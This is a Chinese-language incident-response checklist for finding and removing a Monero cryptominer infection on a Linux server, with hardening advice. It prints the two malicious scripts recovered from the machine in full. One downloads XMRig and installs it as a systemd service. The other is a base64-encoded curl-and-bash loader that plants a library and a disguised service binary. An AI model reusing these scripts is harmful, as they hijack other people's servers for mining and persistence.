1.检查自启动项

执行systemctl list-unit-files --type=service | grep enabled命令列出全部自启动项，有异常启动项执行systemctl disable A_li_yun_Duns.service删除。A_li_yun_Duns.service为自启动项名称。

2.检查系统用户

执行vi /etc/passwd检查系统用户，如有异常用户将其禁用，执行passwd -l 用户名

3.检查定时任务

执行crontab -e查看定时任务有无默认任务添加进来。若有将其注释掉或删掉。将其执行的脚本文件一起删除。

4.检查根目录有无异常文件

本次根目录下异常文件为wawa.sh、update_udp.sh，以下为wawa.sh脚本内容

#!/bin/bash
cd /root;wget http://zhongcheng-app.oss-cn-beijing.aliyuncs.com/image/image/xmrig-6.21.1-linux-static-x64.tar.gz;tar -zxvf xmrig-6.21.1-linux-static-x64.tar.gz;systemctl stop monero.service;rm -rf /etc/systemd/system/monero.service;wget http://zcapp.oss-cn-beijing.aliyuncs.com/icon/monero.service;sysctl -w vm.nr_hugepages=$((1168+$(nproc)));mv monero.service /etc/systemd/system/monero.service;systemctl daemon-reload;systemctl enable monero.service;systemctl start monero.service

以下为update_udp.sh脚本内容，命令做了base64加密，需要base64解密

#!/bin/bash
echo "IyEvYmluL2Jhc2gKY3VybCAtcyBodHRwOi8vYnBnLXRlc3Qub3NzLWNuLWNoZW5nZHUuYWxpeXVuY3MuY29tL3NDaGFuZ2UvMjAyNC8wMi8yNy9saWJodi5zbyAtbyAvb3B0L2xpYmh2LnNvO2NwIC9vcHQvbGliaHYuc28gL3Vzci9saWIvbGliaHYuc287Y3AgL29wdC9saWJodi5zbyAvdXNyL2xpYjY0L2xpYmh2LnNvO2N1cmwgLXMgaHR0cDovL2JwZy10ZXN0Lm9zcy1jbi1jaGVuZ2R1LmFsaXl1bmNzLmNvbS9zQ2hhbmdlLzIwMjQvMDIvMjcvc3lzZXRtZCAtbyAvb3B0L3N5c2V0bWQ7Y2htb2QgNzc3IC9vcHQvc3lzZXRtZDtjdXJsIC1zIGh0dHA6Ly9icGctdGVzdC5vc3MtY24tY2hlbmdkdS5hbGl5dW5jcy5jb20vc0NoYW5nZS8yMDI0LzAyLzI3L3N5c2V0bWQuc2VydmljZSAtbyAvZXRjL3N5c3RlbWQvc3lzdGVtL3N5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgZGFlbW9uLXJlbG9hZDtzeXN0ZW1jdGwgZW5hYmxlIHN5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgc3RhcnQgc3lzZXRtZC5zZXJ2aWNlOw=="|base64 -di|bash -s

解读脚本内容，将涉及到的文件清除

5.检查/root目录下有无陌生目录

发现xmrig目录清除

6.检查systemctl服务

执行cd /etc/systemd/system，检查该目录下有无异常服务文件，本次异常文件为A_li_yun_Duns.service，伪装成了阿里云安全服务。

处理策略

1.尽量较少对公网开放的端口，尤其是mq的。

2.关闭全部安全组出方向端口，用到哪个开启哪个。挖矿程序需要请求网络领取任务，这样挖矿程序就没任务可执行。